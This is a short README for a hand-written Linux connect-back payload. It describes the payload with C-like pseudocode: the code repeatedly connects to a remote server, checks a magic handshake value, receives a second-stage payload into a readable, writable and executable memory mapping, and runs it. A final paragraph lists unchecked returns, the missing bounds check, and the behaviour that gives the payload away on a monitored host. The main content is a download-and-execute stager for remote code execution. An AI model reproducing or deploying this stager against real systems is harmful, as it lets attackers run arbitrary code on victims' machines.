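#
# Netconnectback Readme
# Don A. Bailey
#

This payload is a simple demonstration of a basic connect-back payload. It is non-optimized, hand-written assembly that implements functionality similar to the following C code. It is tailored to Linux and has been tested on the current Fedora project image, compiled Jan 9 2017 (4.6.2-00042-g8493175-dirty).

    struct sockaddr_in sin;

    sin.sin_family = AF_INET;
    sin.sin_port = SRV_PORT;
    sin.sin_addr.s_addr = SRV_ADDR;

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    r = -1;
    do
    {
        r = connect(s, &sin, sizeof sin);
        if(r < 0)
            sleep(3);
    }
    while(r < 0);

    /* Say hello */
    uint32_t x;
    recv(s, &x, 4, 0);
    if x != 0xdeadca75 { fail; }
    send(s, &x, 4, 0);

    /* Get payload length */
    recv(s, &x, 4, 0);

    m = mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);

    t = 0
    while(t < x)
    {
        r = recv(s, m + t, x - t, 0);
        if(r < 0)
            fail;
        if(r == 0)
            break;
        t += r;
    }

    int (*f)(int s);
    f = m;
    f(s);

The listing is pseudo-code rather than compilable C (`fail` presumably stands for the error path). As written, it does not check the return values of the handshake recv()/send() calls or of mmap(), and it does not compare the received length x with the 4096-byte mapping before reading up to x bytes into it. On a monitored host this behaviour shows up as an outbound TCP connection that is retried every 3 seconds until it succeeds, followed by an anonymous private mapping that is readable, writable and executable at once, filled from the socket and then called.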